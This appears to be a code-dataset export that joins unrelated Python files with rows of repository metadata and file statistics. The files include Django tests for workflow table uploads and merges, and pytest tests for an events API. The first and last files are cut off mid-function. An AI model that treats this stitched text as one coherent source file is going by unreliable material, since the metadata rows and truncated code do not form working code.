{'name': tests.wflow_name + '2', 'attributes': {'one': 'two'}},
format='json')
# Get the only workflow in the fixture
workflow = models.Workflow.objects.get(id=response.data['id'])
# Upload the table
self.client.post(
reverse('table:api_ops', kwargs={'wid': workflow.id}),
{'data_frame': self.new_table},
format='json')
# Refresh wflow (has been updated)
workflow = models.Workflow.objects.get(id=workflow.id)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Transform new table into data frame
r_df = pd.DataFrame(self.new_table)
r_df = pandas.detect_datetime_columns(r_df)
# Compare both elements
self.compare_tables(r_df, dframe)
def test_table_json_create_error(self):
# Create a second workflow
response = self.client.post(
reverse('workflow:api_workflows'),
{'name': tests.wflow_name + '2', 'attributes': {'one': 'two'}},
format='json')
# Get the only workflow in the fixture
workflow = models.Workflow.objects.get(id=response.data['id'])
# Upload the table
response = self.client.post(
reverse('table:api_ops', kwargs={'wid': workflow.id}),
{'data_frame': self.incorrect_table_1},
format='json')
self.assertTrue(
'The data has no column with unique values per row' in
response.data
)
def test_table_pandas_create(self):
# Create a second workflow
response = self.client.post(
reverse('workflow:api_workflows'),
{'name': tests.wflow_name + '2', 'attributes': {'one': 'two'}},
format='json')
# Get the only workflow in the fixture
workflow = models.Workflow.objects.get(id=response.data['id'])
# Transform new table into a data frame
r_df = pd.DataFrame(self.new_table)
r_df = pandas.detect_datetime_columns(r_df)
# Upload the table
self.client.post(
reverse('table:api_pops', kwargs={'wid': workflow.id}),
{'data_frame': serializers.df_to_string(r_df)},
format='json')
# Refresh wflow (has been updated)
workflow = models.Workflow.objects.get(id=workflow.id)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements
self.compare_tables(r_df, dframe)
def test_table_JSON_update(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = pd.DataFrame(self.new_table)
r_df = pandas.detect_datetime_columns(r_df)
# Upload a new table
self.client.put(
reverse(
'table:api_ops',
kwargs={'wid': workflow.id}),
{'data_frame': self.new_table},
format='json')
# Refresh wflow (has been updated)
workflow = models.Workflow.objects.get(id=workflow.id)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements
self.compare_tables(r_df, dframe)
def test_table_pandas_update(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = pd.DataFrame(self.new_table)
r_df = pandas.detect_datetime_columns(r_df)
# Upload a new table
self.client.put(
reverse(
'table:api_pops',
kwargs={'wid': workflow.id}),
{'data_frame': serializers.df_to_string(r_df)},
format='json')
# Refresh wflow (has been updated)
workflow = models.Workflow.objects.get(id=workflow.id)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements
self.compare_tables(r_df, dframe)
def test_table_JSON_flush(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Flush the data in the table
self.client.delete(reverse(
'table:api_ops',
kwargs={'wid': workflow.id}))
def test_table_pandas_flush(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Flush the data in the table
self.client.delete(
reverse('table:api_pops', kwargs={'wid': workflow.id}))
class TableApiMerge(TableApiBase):
# Getting the table through the merge API
def test_table_pandas_JSON_get(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
response = self.client.get(
reverse('table:api_merge', kwargs={'wid': workflow.id}))
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = pd.DataFrame(response.data['src_df'])
r_df = pandas.detect_datetime_columns(r_df)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements and check wf df consistency
self.compare_tables(r_df, dframe)
def test_table_pandas_merge_get(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
response = self.client.get(
reverse('table:api_pmerge', kwargs={'wid': workflow.id}))
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = serializers.string_to_df(response.data['src_df'])
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements and check wf df consistency
self.compare_tables(r_df, dframe)
# Merge and create an empty dataset
def test_table_JSON_merge_to_empty(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
response = self.client.put(
reverse('table:api_merge', kwargs={'wid': workflow.id}),
{
"src_df": self.new_table,
"how": "inner",
"left_on": "sid",
"right_on": "sid"
},
format='json')
self.assertEqual(
response.data['detail'],
'Unable to perform merge operation: '
+ 'Merge operation produced a result with no rows')
def test_table_pandas_merge_to_empty(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = pd.DataFrame(self.new_table)
# Get the data through the API
response = self.client.put(
reverse('table:api_pmerge', kwargs={'wid': workflow.id}),
{
"src_df": serializers.df_to_string(r_df),
"how": "inner",
"left_on": "sid",
"right_on": "sid"
},
format='json')
self.assertEqual(response.data['detail'],
'Unable to perform merge operation: '
+ 'Merge operation produced a result with no rows')
# Merge with inner values
def test_table_JSON_merge_to_inner(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
self.client.put(
reverse('table:api_merge', kwargs={'wid': workflow.id}),
{
"src_df": self.src_df,
"how": "inner",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# Get the updated object
workflow = models.Workflow.objects.all()[0]
# Result should have two rows
self.assertEqual(workflow.nrows, 2)
def test_table_pandas_merge_to_inner(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = pd.DataFrame(self.src_df)
# Get the data through the API
self.client.put(
reverse('table:api_pmerge', kwargs={'wid': workflow.id}),
{
"src_df": serializers.df_to_string(r_df),
"how": "inner",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# Get the updated object
workflow = models.Workflow.objects.all()[0]
# Result should have two rows
self.assertEqual(workflow.nrows, 2)
def test_table_JSON_merge_to_outer(self):
"""Merge with outer values."""
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
age = workflow.columns.filter(name='age')[0]
age.is_key = False
age.save()
email = workflow.columns.filter(name='email')[0]
email.is_key = False
email.save()
# Get the data through the API
response = self.client.put(
reverse('table:api_merge', kwargs={'wid': workflow.id}),
{
"src_df": self.src_df,
"how": "outer",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# No anomaly should be detected
self.assertEqual(None, response.data.get('detail'))
# Get the new workflow
workflow = models.Workflow.objects.all()[0]
# Result should have three rows as the initial DF
self.assertEqual(workflow.nrows, 4)
def test_table_pandas_merge_to_outer(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
age = workflow.columns.filter(name='age')[0]
age.is_key = False
age.save()
email = workflow.columns.filter(name='email')[0]
email.is_key = False
email.save()
# Transform new table into string
r_df = pd.DataFrame(self.src_df)
# Get the data through the API
response = self.client.put(
reverse('table:api_pmerge', kwargs={'wid': workflow.id}),
{
"src_df": serializers.df_to_string(r_df),
"how": "outer",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# No anomaly should be detected
self.assertEqual(None, response.data.get('detail'))
# Get the new workflow
workflow = models.Workflow.objects.all()[0]
# Result should have three rows as the initial DF
self.assertEqual(workflow.nrows, 4)
# Merge with left values
def test_table_JSON_merge_to_left(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
age = workflow.columns.filter(name='age')[0]
age.is_key = False
age.save()
email = workflow.columns.filter(name='email')[0]
email.is_key = False
email.save()
# Get the data through the API
self.client.put(
reverse('table:api_merge', kwargs={'wid': workflow.id}),
{
"src_df": self.src_df,
"how": "left",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# Get the new workflow
workflow = models.Workflow.objects.all()[0]
# Result should have three rows as the initial DF
self.assertEqual(workflow.nrows, 3)
dframe = pandas.load_table(workflow.get_data_frame_table_name())
self.assertEqual(dframe[dframe['sid'] == 1]['newcol'].values[0],
self.src_df['newcol'][0])
def test_table_pandas_merge_to_left(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = pd.DataFrame(self.src_df)
# Get the data through the API
self.client.put(
reverse('table:api_pmerge', kwargs={'wid': workflow.id}),
{
"src_df": serializers.df_to_string(r_df),
"how": "left",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# Get the new workflow
workflow = models.Workflow.objects.all()[0]
# Result should have three rows as the initial DF
self.assertEqual(workflow.nrows, 3)
dframe = pandas.load_table(workflow.get_data_frame_table_name())
self.assertEqual(dframe[dframe['sid'] == 1]['newcol'].values[0],
self.src_df['newcol'][0])
# Merge with outer values but producing NaN everywhere
def test_table_JSON_merge_to_outer_NaN(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
age = workflow.columns.filter(name='age')[0]
age.is_key = False
age.save()
email = workflow.columns.filter(name='email')[0]
email.is_key = False
email.save()
# Drop the column with booleans because the data type is lost
delete_column(
self.user,
workflow,
workflow.columns.get(name='registered'))
# Transform new table into string
r_df = pd.DataFrame(self.src_df2)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
new_df = pd.merge(
dframe,
r_df,
how="outer",
left_on="sid",
right_on="sid")
# Get the data through the API
self.client.put(
reverse('table:api_merge', kwargs={'wid': workflow.id}),
{
"src_df": self.src_df2,
"how": "outer",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# Get the new workflow
workflow = models.Workflow.objects.all()[0]
# Result should have three rows as the initial DF
self.assertEqual(workflow.nrows, 4)
self.assertEqual(workflow.ncols, 8)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements and check wf df consistency
self.compare_tables(dframe, new_df)
def test_table_pandas_merge_to_outer_NaN(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
age = workflow.columns.filter(name='age')[0]
age.is_key = False
age.save()
email = workflow.columns.filter(name='email')[0]
email.is_key = False
email.save()
# Drop the column with booleans because the data type is lost
delete_column(
self.user,
workflow,
workflow.columns.get(name='registered'))
# Transform new table into string
r_df = pd.DataFrame(self.src_df2)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
new_df = pd.merge(
dframe,
r_df,
how="outer",
left_on="sid",
right_on="sid")
# Get the data through the API
self.client.put(
reverse('table:api_pmerge', kwargs={'wid': workflow.id}),
{
"src_df": serializers.df_to_string(r_df),
"how": "outer",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# Get the new workflow
workflow = models.Workflow.objects.all()[0]
# Result should have three rows as the initial DF
self.assertEqual(workflow.nrows, 4)
self.assertEqual(workflow.ncols, 8)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements and check wf df consistency
self.compare_tables(dframe, new_df)
# Merge a single row with non-localised date/time fields.
def test_table_JSON_merge_datetimes(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
response = self.client.put(
reverse('table:api_merge', kwargs={'wid': workflow.id}),
{
"how": "outer",
"left_on": "sid",
"right_on": "sid",
"src_df": {
"sid": {"0": 4},
"email": {"0": "student04@bogus.com"},
"age": {"0": 14},
"tstamp1": {"0": ""},
"tstamp2": {"0": "2019-05-10 20:40:48.269638"},
"tstamp3": {"0": "2019-06-03 15:28:59.787917"},
"tstamp4": {"0": "2019-06-03 15:28:59.787917+09:30"},
},
},
format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
workflow = models.Workflow.objects.all()[0]
dst_df = pandas.load_table(workflow.get_data_frame_table_name())
self.assertEqual(workflow.nrows, 4)
self.assertEqual(
workflow.columns.get(name='tstamp2').data_type,
'datetime')
self.assertTrue(all(
elem.tzinfo is not None and elem.tzinfo.utcoffset(elem) is not None
for elem in dst_df['tstamp2'].dropna()))
self.assertEqual(
workflow.columns.get(name='tstamp3').data_type,
'datetime')
self.assertTrue(all(
elem.tzinfo is not None and elem.tzinfo.utcoffset(elem) is not None
for elem in dst_df['tstamp3'].dropna()))
self.assertEqual(
workflow.columns.get(name='tstamp4').data_type,
'datetime')
self.assertTrue(all(
elem.tzinfo is not None and elem.tzinfo.utcoffset(elem) is not None
for elem in dst_df['tstamp4'].dropna()))
| 32.396433
| 79
| 0.571537
| 2,865
| 23,617
| 4.569983
| 0.096335
| 0.021996
| 0.065531
| 0.086382
| 0.853586
| 0.848316
| 0.838463
| 0.822424
| 0.803254
| 0.802643
| 0
| 0.018319
| 0.315832
| 23,617
| 728
| 80
| 32.440934
| 0.791992
| 0.177838
| 0
| 0.662921
| 0
| 0
| 0.113942
| 0.009547
| 0
| 0
| 0
| 0
| 0.060674
| 1
| 0.05618
| false
| 0
| 0.024719
| 0
| 0.103371
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9522e35e6e087c0acb6cec038a8c28c398c20999
| 113
|
py
|
Python
|
beeng/__init__.py
|
sbi-aau/beeng-py
|
d484641fe5a54671369a5d11d4c8418d33098b82
|
[
"BSD-3-Clause"
] | null | null | null |
beeng/__init__.py
|
sbi-aau/beeng-py
|
d484641fe5a54671369a5d11d4c8418d33098b82
|
[
"BSD-3-Clause"
] | null | null | null |
beeng/__init__.py
|
sbi-aau/beeng-py
|
d484641fe5a54671369a5d11d4c8418d33098b82
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from beeng.engine import Engine
from beeng.finder import find_all_engines_from_registry
| 22.6
| 55
| 0.778761
| 17
| 113
| 4.941176
| 0.705882
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010101
| 0.123894
| 113
| 4
| 56
| 28.25
| 0.838384
| 0.185841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1f01cf05d11224e31c0a85c3a700959d397d667a
| 184
|
py
|
Python
|
cms/cms/views.py
|
dhantelrp/django-lab
|
cff9f7bbd338740ab053ca8cc0b3feb599ad0cd8
|
[
"Unlicense"
] | null | null | null |
cms/cms/views.py
|
dhantelrp/django-lab
|
cff9f7bbd338740ab053ca8cc0b3feb599ad0cd8
|
[
"Unlicense"
] | null | null | null |
cms/cms/views.py
|
dhantelrp/django-lab
|
cff9f7bbd338740ab053ca8cc0b3feb599ad0cd8
|
[
"Unlicense"
] | null | null | null |
from django.shortcuts import render
from django.http import HttpResponse
def welcome(request):
# return HttpResponse("hello bosku!!!")
return render(request, 'welcome.html')
| 23
| 43
| 0.75
| 22
| 184
| 6.272727
| 0.636364
| 0.144928
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146739
| 184
| 7
| 44
| 26.285714
| 0.878981
| 0.201087
| 0
| 0
| 0
| 0
| 0.082759
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
1f3c784ac5e41be6aa9922a0930c55323f57e3dd
| 35
|
py
|
Python
|
stream/feed/__init__.py
|
Werded/stream-python
|
3d7ad183ded383bf1d988e2165bc697e15036ac1
|
[
"BSD-3-Clause"
] | null | null | null |
stream/feed/__init__.py
|
Werded/stream-python
|
3d7ad183ded383bf1d988e2165bc697e15036ac1
|
[
"BSD-3-Clause"
] | null | null | null |
stream/feed/__init__.py
|
Werded/stream-python
|
3d7ad183ded383bf1d988e2165bc697e15036ac1
|
[
"BSD-3-Clause"
] | null | null | null |
from .feeds import AsyncFeed, Feed
| 17.5
| 34
| 0.8
| 5
| 35
| 5.6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 35
| 1
| 35
| 35
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1f8f5b2c9cc0bf9a25e5a8bdcb402e146b9b0f50
| 122
|
py
|
Python
|
Data Scientist Career Path/3. Python Fundamentals/5. Python List/3. Working with List/3. list range.py
|
myarist/Codecademy
|
2ba0f104bc67ab6ef0f8fb869aa12aa02f5f1efb
|
[
"MIT"
] | 23
|
2021-06-06T15:35:55.000Z
|
2022-03-21T06:53:42.000Z
|
Data Scientist Career Path/3. Python Fundamentals/5. Python List/3. Working with List/3. list range.py
|
shivaniverma1/Data-Scientist
|
f82939a411484311171465591455880c8e354750
|
[
"MIT"
] | null | null | null |
Data Scientist Career Path/3. Python Fundamentals/5. Python List/3. Working with List/3. list range.py
|
shivaniverma1/Data-Scientist
|
f82939a411484311171465591455880c8e354750
|
[
"MIT"
] | 9
|
2021-06-08T01:32:04.000Z
|
2022-03-18T15:38:09.000Z
|
# Your code below:
number_list = range(9)
print(list(number_list))
zero_to_seven = range(8)
print(list(zero_to_seven))
| 15.25
| 26
| 0.745902
| 21
| 122
| 4.047619
| 0.571429
| 0.235294
| 0.235294
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018692
| 0.122951
| 122
| 8
| 26
| 15.25
| 0.775701
| 0.131148
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
2f09e20dc1f845d8e664b0c970c26c2fb78252be
| 24,912
|
py
|
Python
|
tests/api/test_event.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 1
|
2021-06-01T14:49:18.000Z
|
2021-06-01T14:49:18.000Z
|
tests/api/test_event.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 286
|
2020-12-04T14:13:00.000Z
|
2022-03-09T19:05:16.000Z
|
tests/api/test_event.py
|
DanielGrams/gsevpt
|
a92f71694388e227e65ed1b24446246ee688d00e
|
[
"MIT"
] | null | null | null |
import base64
import pytest
from project.models import PublicStatus
def test_read(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id = seeder.create_event(admin_unit_id)
with app.app_context():
from project.models import Event, EventStatus
from project.services.event import update_event
event = Event.query.get(event_id)
event.status = EventStatus.scheduled
update_event(event)
db.session.commit()
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_ok(url)
assert response.json["status"] == "scheduled"
def test_read_otherDraft(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base(log_in=False)
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
def test_read_myDraft(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
assert response.json["public_status"] == "draft"
def test_read_otherUnverified(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base(log_in=False, admin_unit_verified=False)
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
def test_read_myUnverified(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access(admin_unit_verified=False)
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
def test_read_co_organizers(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id, organizer_a_id, organizer_b_id = seeder.create_event_with_co_organizers(
admin_unit_id
)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
assert response.json["co_organizers"][0]["id"] == organizer_a_id
assert response.json["co_organizers"][1]["id"] == organizer_b_id
def test_list(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id = seeder.create_event(admin_unit_id)
seeder.create_event(admin_unit_id, draft=True)
seeder.create_event_unverified()
url = utils.get_url("api_v1_event_list")
response = utils.get_ok(url)
assert len(response.json["items"]) == 1
assert response.json["items"][0]["id"] == event_id
def test_search(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id = seeder.create_event(admin_unit_id)
image_id = seeder.upsert_default_image()
seeder.assign_image_to_event(event_id, image_id)
seeder.create_event(admin_unit_id, draft=True)
seeder.create_event_unverified()
url = utils.get_url("api_v1_event_search")
response = utils.get_ok(url)
assert len(response.json["items"]) == 1
assert response.json["items"][0]["id"] == event_id
def test_dates(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_base(log_in=False)
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event_dates", id=event_id)
utils.get_ok(url)
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
_, _, event_id = seeder.create_event_unverified()
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
def test_dates_myDraft(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
def test_dates_myUnverified(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access(admin_unit_verified=False)
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
def create_put(
place_id,
organizer_id,
name="Neuer Name",
start="2021-02-07T11:00:00.000Z",
legacy=False,
):
data = {
"name": name,
"start": start,
"place": {"id": place_id},
"organizer": {"id": organizer_id},
}
if legacy:
data["start"] = start
else:
data["date_definitions"] = [{"start": start}]
return data
@pytest.mark.parametrize(
"variant", ["normal", "legacy", "recurrence", "two_date_definitions"]
)
def test_put(client, seeder, utils, app, mocker, variant):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
utils.mock_now(mocker, 2020, 1, 1)
put = create_put(place_id, organizer_id, legacy=(variant == "legacy"))
put["rating"] = 10
put["description"] = "Neue Beschreibung"
put["external_link"] = "http://www.google.de"
put["ticket_link"] = "http://www.yahoo.de"
put["tags"] = "Freizeit, Klönen"
put["kid_friendly"] = True
put["accessible_for_free"] = True
put["age_from"] = 9
put["age_to"] = 99
put["target_group_origin"] = "tourist"
put["attendance_mode"] = "online"
put["status"] = "movedOnline"
put["previous_start_date"] = "2021-02-07T10:00:00+01:00"
put["registration_required"] = True
put["booked_up"] = True
put["expected_participants"] = 500
put["price_info"] = "Erwachsene 5€, Kinder 2€."
put["public_status"] = "draft"
if variant == "recurrence":
put["date_definitions"][0]["recurrence_rule"] = "RRULE:FREQ=DAILY;COUNT=7"
if variant == "two_date_definitions":
put["date_definitions"].append({"start": "2021-02-07T12:00:00.000Z"})
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.dateutils import create_berlin_date
from project.models import (
Event,
EventAttendanceMode,
EventStatus,
EventTargetGroupOrigin,
)
event = Event.query.get(event_id)
assert event.name == "Neuer Name"
assert event.event_place_id == place_id
assert event.organizer_id == organizer_id
assert event.rating == put["rating"]
assert event.description == put["description"]
assert event.external_link == put["external_link"]
assert event.ticket_link == put["ticket_link"]
assert event.tags == put["tags"]
assert event.kid_friendly == put["kid_friendly"]
assert event.accessible_for_free == put["accessible_for_free"]
assert event.age_from == put["age_from"]
assert event.age_to == put["age_to"]
assert event.target_group_origin == EventTargetGroupOrigin.tourist
assert event.attendance_mode == EventAttendanceMode.online
assert event.status == EventStatus.movedOnline
assert event.previous_start_date == create_berlin_date(2021, 2, 7, 10, 0)
assert event.registration_required == put["registration_required"]
assert event.booked_up == put["booked_up"]
assert event.expected_participants == put["expected_participants"]
assert event.price_info == put["price_info"]
assert event.public_status == PublicStatus.draft
if variant == "two_date_definitions":
assert len(event.date_definitions) == 2
else:
assert len(event.date_definitions) == 1
len_dates = len(event.dates)
if variant == "recurrence":
assert (
event.date_definitions[0].recurrence_rule
== put["date_definitions"][0]["recurrence_rule"]
)
assert len_dates == 7
elif variant == "two_date_definitions":
assert len_dates == 2
else:
assert len_dates == 1
def test_put_invalidRecurrenceRule(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
put["date_definitions"][0]["recurrence_rule"] = "RRULE:FREQ=SCHMAILY;COUNT=7"
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_missingName(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
del put["name"]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_missingPlace(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
del put["place"]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_placeFromAnotherAdminUnit(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_admin_unit_id = seeder.create_admin_unit(user_id, "Other Crew")
place_id = seeder.upsert_default_event_place(other_admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, create_put(place_id, organizer_id))
utils.assert_response_bad_request(response)
utils.assert_response_api_error(response, "Check Violation")
def test_put_missingOrganizer(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
del put["organizer"]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_organizerFromAnotherAdminUnit(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
other_admin_unit_id = seeder.create_admin_unit(user_id, "Other Crew")
organizer_id = seeder.upsert_default_event_organizer(other_admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, create_put(place_id, organizer_id))
utils.assert_response_bad_request(response)
utils.assert_response_api_error(response, "Check Violation")
def test_put_co_organizers(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
organizer_a_id = seeder.upsert_event_organizer(admin_unit_id, "Organizer A")
organizer_b_id = seeder.upsert_event_organizer(admin_unit_id, "Organizer B")
put = create_put(place_id, organizer_id)
put["co_organizers"] = [
{"id": organizer_a_id},
{"id": organizer_b_id},
]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert len(event.co_organizers) == 2
assert event.co_organizers[0].id == organizer_a_id
assert event.co_organizers[1].id == organizer_b_id
def test_put_co_organizerFromAnotherAdminUnit(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
